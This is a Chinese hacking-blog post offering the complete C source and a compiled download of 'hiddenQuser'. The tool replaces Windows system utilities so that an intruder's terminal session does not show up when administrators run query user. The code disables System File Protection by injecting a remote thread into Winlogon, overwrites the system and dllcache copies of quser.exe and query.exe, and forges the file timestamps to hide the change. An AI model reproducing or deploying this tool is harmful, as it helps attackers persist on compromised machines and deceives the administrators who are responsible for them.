hiddenQuser + 源码

鬼仔:query user 这个命令大家都知道吧?这个程序的作用就是替换系统目录下的Quser.exe与Query.exe,这样你登录终端后,管理员使用 query user 查看时看不到你已经登录了,但是有一点不足的就是在任务管理器中没有隐藏。

来源:精灵's Blog
执行后替换系统目录下的Quser.exe与Query.exe ,登陆过终端服务器的朋友都知道这两个工具是做啥的吧~

大家都知道,在Windows 2000和Windows XP及2003系统中有系统文件保护功能,一旦被保护的系统文件被修改了,就会弹出需要插入系统安装盘CD的对话框。所以本工具采用了黑客之门的方法,通过远程注入进程让系统文件保护暂时失效,然后执行替换的操作.执行后自动替换系统的这两个文件包括dllcache下的对应文件,让系统文件保护也无法还原系统原来的这两个文件.

没什么技术含量,在任务管理器中隐藏还不会.
程序代码:

#include
#include
#include
#include"resource.h"

BOOL ExtractFile(LPCTSTR szResourceType,LPCTSTR szResourceName,LPCTSTR szFilePath,HMODULE hModule, // = NULL,
BOOL bHidden ); // = TRUE
DWORD GetProcessIDFromName(char * name);
BOOL DebugPrivilege(const char *PName,BOOL bEnable);

FILETIME lpCreationTime; // 文件夹的创建时间
FILETIME lpLastAccessTime; // 对文件夹的最近访问时间
FILETIME lpLastWriteTime; // 文件夹的最近修改时间

void main(int argc,char * argv[])
{
char System[MAX_PATH] = {0};
char System1[MAX_PATH] = {0};
char System2[MAX_PATH] = {0};
char System3[MAX_PATH] = {0};
char System4[MAX_PATH] = {0};
char Queryexe[MAX_PATH] = {0};
char Queryexe1[MAX_PATH] = {0};
char Quserexe[MAX_PATH] = {0};
char Quserexe1[MAX_PATH] = {0};
HANDLE hFile = INVALID_HANDLE_VALUE;

printf("\n=========================================================================\n");
printf("[F.S.T] hidden Other user info when execute query.exe & quser.exe\n");
printf("Welcome to [F.S.T] Http://Www.Wrsky.com\n");
printf("Code by Sprite\n");
printf("=========================================================================\n");

GetSystemDirectory(System,MAX_PATH);

strcat(Queryexe,System);
strcat(Queryexe,"\\query.exe");
printf("%s\n",Queryexe);

hFile = CreateFile(Queryexe,
GENERIC_READ,
FILE_SHARE_READ|FILE_SHARE_DELETE,
NULL,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS,
NULL
);

// 获取文件夹时间属性信息
GetFileTime(hFile, &lpCreationTime, &lpLastAccessTime, &lpLastWriteTime);

CloseHandle(hFile);

strcat(Quserexe,System);
strcat(Quserexe,"\\quser.exe");
printf("%s\n",Quserexe);

strcat(Queryexe1,System);
strcat(Queryexe1,"\\dllcache");
strcat(Queryexe1,"\\query.exe");
printf("%s\n",Queryexe1);

strcat(Quserexe1,System);
strcat(Quserexe1,"\\dllcache");
strcat(Quserexe1,"\\quser.exe");
printf("%s\n",Quserexe1);

strcat(System1,"rename ");
strcat(System1,System);
strcat(System1,"\\query.exe ");
strcat(System1,"query1.exe");

strcat(System2,"rename ");
strcat(System2,System);
strcat(System2,"\\quser.exe ");
strcat(System2,"quser1.exe");

strcat(System3,"rename ");
strcat(System3,System);
strcat(System3,"\\dllcache");
strcat(System3,"\\query.exe ");
strcat(System3,"query1.exe");

strcat(System4,"rename ");
strcat(System4,System);
strcat(System4,"\\dllcache");
strcat(System4,"\\quser.exe ");
strcat(System4,"quser1.exe");

printf("%s\n",System1);
printf("%s\n",System2);
printf("%s\n",System3);
printf("%s\n",System4);

DebugPrivilege("SeDebugPrivilege",TRUE);

/*得到进程的ID,具体的方法可以使用CreateToolHelpSnap32(),ProcessFirst32()以及ProcessNext32()得到*/

DWORD dwPid=GetProcessIDFromName("Winlogon.exe");

printf("Winlogon 's Process ID is:%d\n",dwPid);

HANDLE hProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid);

DWORD dwVersion;

HMODULE hSfc;

dwVersion = GetVersion();

//判断操作系统的类型

if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5)

{// Windows 2000/XP/2003

if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0) //Windows 2000

hSfc = LoadLibrary("sfc.dll");

else if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 1) //Windows XP

hSfc = LoadLibrary("sfc_os.dll");
else if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 2) //Windows 2003

hSfc = LoadLibrary("sfc_os.dll");

}

//得到函数的地址

FARPROC dwAddress=GetProcAddress(hSfc,MAKEINTRESOURCE(2));

DWORD dwThreadId;

HANDLE hThread;

//创建远线程

hThread =CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *) (void *))dwAddress,0,0,&dwThreadId);

WaitForSingleObject(hThread,2000l);

system(System3);
system(System1);
system(System4);
system(System2);

if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE1),Queryexe1,NULL,FALSE))
printf("Extract %s Success!\n",Queryexe1);
else
printf("Extract %s Error!\n",Queryexe1);

if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE1),Queryexe,NULL,FALSE))
printf("Extract %s Success!\n",Queryexe);
else
printf("Extract %s Error!\n",Queryexe);

if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE2),Quserexe1,NULL,FALSE))
printf("Extract %s Success!\n",Quserexe1);
else
printf("Extract %s Error!\n",Quserexe1);

if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE2),Quserexe,NULL,FALSE))
printf("Extract %s Success!\n",Quserexe);
else
printf("Extract %s Error!\n",Quserexe);
DebugPrivilege(SE_DEBUG_NAME,FALSE);
CloseHandle(hThread);
}

/*函数ExtractFile(导出一个自定义资源)*/
BOOL ExtractFile(LPCTSTR szResourceType,LPCTSTR szResourceName,LPCTSTR szFilePath,HMODULE hModule, // = NULL,
BOOL bHidden ) // = TRUE
{
// 如果用户没指定实例句柄,则假设在当前进程中
HMODULE hCurProc = hModule;
if ( NULL == hModule )
hCurProc = GetModuleHandle(NULL);
//ASSERT( hCurProc ); // find the RESOURCE_DEFINE resource data.
HRSRC hResourceExeFile;
hResourceExeFile = FindResource(hCurProc,szResourceName,szResourceType );

if ( ! hResourceExeFile )
{
//TRACE(_T("findresource failed!!(%ld) "), GetLastError());
printf("findresource failed!!(%ld) ", GetLastError());
return FALSE;
} // get size of resource
DWORD dwSize = SizeofResource( (HMODULE)hCurProc, hResourceExeFile );
if ( 0 == dwSize )
{
//TRACE(_T("can not get the resource size"));
printf("can not get the resource size");
return FALSE;
} // alloc the global memory
HGLOBAL hGlobalMem = LoadResource(hCurProc, hResourceExeFile );

if ( NULL == hGlobalMem )
{
//TRACE(_T("LoadResource failed! %ld"), GetLastError());
printf("LoadResource failed! %ld", GetLastError());
return FALSE;
}
// lock the resource
LPVOID lpExe = LockResource( hGlobalMem );
//ASSERT( lpExe );
/*if (!DeleteFile(szFilePath))
{
printf("删除文件失败!");
return false;
}*/
// 是否隐藏
DWORD dwAttrib = FILE_ATTRIBUTE_NORMAL;
if ( bHidden )
dwAttrib |= FILE_ATTRIBUTE_HIDDEN; // copy to file!!

HANDLE hFile = INVALID_HANDLE_VALUE;

hFile = CreateFile(szFilePath,
GENERIC_WRITE,
0,
NULL,
CREATE_NEW,
dwAttrib,
NULL
);
if ( INVALID_HANDLE_VALUE == hFile )
{
//TRACE("can not open the target file (%ld) ", GetLastError());
printf("can not open the target file (%ld) ", GetLastError());
return FALSE;
}
DWORD dwWritten;

if ( ! WriteFile( hFile, lpExe, dwSize, &dwWritten, NULL ) )
{
//TRACE(_T("can not write the target file %ld"), GetLastError());
printf("can not write the target file %ld", GetLastError());
CloseHandle( hFile );
return FALSE;
}
//设置文件日期
SetFileTime(hFile, &lpCreationTime, &lpLastAccessTime, &lpLastWriteTime);

CloseHandle( hFile );
return TRUE;
}

//提升特权

BOOL DebugPrivilege(const char *PName,BOOL bEnable)
{
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;

if(OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&hToken) == 0)
{
printf("Fail To OpenProcess \r\n");
bResult = FALSE;
return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
LookupPrivilegeValue(NULL,PName,&TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
if(GetLastError() != ERROR_SUCCESS)
{
printf("Fail To AddPrivilege \r\n");
bResult = FALSE;
}
CloseHandle(hToken);

return bResult;
}

//得到进程ID

DWORD GetProcessIDFromName(char * name)
{
HANDLE snapshot ;
PROCESSENTRY32 processinfo ;
processinfo.dwSize = sizeof (processinfo) ;
snapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0) ;
if (snapshot == NULL) return FALSE;

BOOL status = Process32First (snapshot, &processinfo) ;
while (status)
{
if(stricmp(name,processinfo.szExeFile)==0)
return processinfo.th32ProcessID;
status = Process32Next (snapshot, &processinfo);
}
return -1;
}

编译好的程序下载:
hiddenQuser.rar

相关日志

发表评论